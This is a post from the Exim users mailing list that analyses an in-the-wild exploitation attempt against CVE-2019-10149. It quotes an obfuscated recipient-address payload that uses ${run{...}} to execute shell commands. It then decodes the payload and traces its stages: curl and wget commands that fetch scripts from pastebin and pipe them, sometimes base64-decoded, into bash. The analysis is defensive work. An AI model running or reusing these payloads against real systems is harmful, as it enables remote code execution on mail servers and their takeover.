Re: [exim] CVE-2019-10149: already vulnerable ?

Top Page
Delete this message
Reply to this message
Author: Drav Sloan
Date:  
To: Exim Users
Subject: Re: [exim] CVE-2019-10149: already vulnerable ?
Benoît PELISSIER via Exim-users wrote:
> ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost


$ perl -e 'print
"\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22\n";'
/bin/sh -c      "curl https://pastebin.com/raw/Dj3JTtnj -o /tmp/baby"


then:

$ wget --quiet -O - https://pastebin.com/raw/Dj3JTtnj && echo

nohup bash -c '(curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q
-O- hhttps://pastebin.com/raw/EzqVke6X)|bash' >/dev/null 2>&1 &
rm -rf /tmp/baby*

$ wget --quiet -O - https://pastebin.com/raw/EzqVke6X && echo
(curl -fsSL https://pastebin.com/raw/yVAeeKTB||wget -q -O -
https://pastebin.com/raw/yVAeeKTB)| base64 -d |bash

Which yeilds the content I've pasted at:

https://pastebin.com/Gzi4cvc8

Regards

D.